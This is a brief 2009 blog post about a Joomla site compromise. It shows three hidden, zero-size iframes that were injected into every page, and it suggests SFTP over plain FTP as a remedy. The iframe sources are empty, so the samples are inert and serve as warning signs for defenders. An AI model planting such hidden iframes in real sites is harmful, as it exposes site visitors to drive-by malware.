Monday, November 02, 2009

Joomla vulnerabilities I've seen

This bit of code was inserted to the bottom of every page on the server.
<iframe src="" width="0" height="0" style="hidden" frameborder="0" marginheight="0" marginwidth="0" scrolling="no"></iframe>
as part of the remedy, you and I should look into sftp rather than plain ftp as one possible loophole to cover. See for more. Here is another block of iframe to watch out for:
<iframe src="" width=0 height=0 style="hidden" frameborder=0 marginheight=0 marginwidth=0 scrolling=no></iframe>
And another one:
<iframe src="" width=0 height=0 style="hidden" frameborder=0 marginheight=0 marginwidth=0 scrolling=no></iframe>

No comments: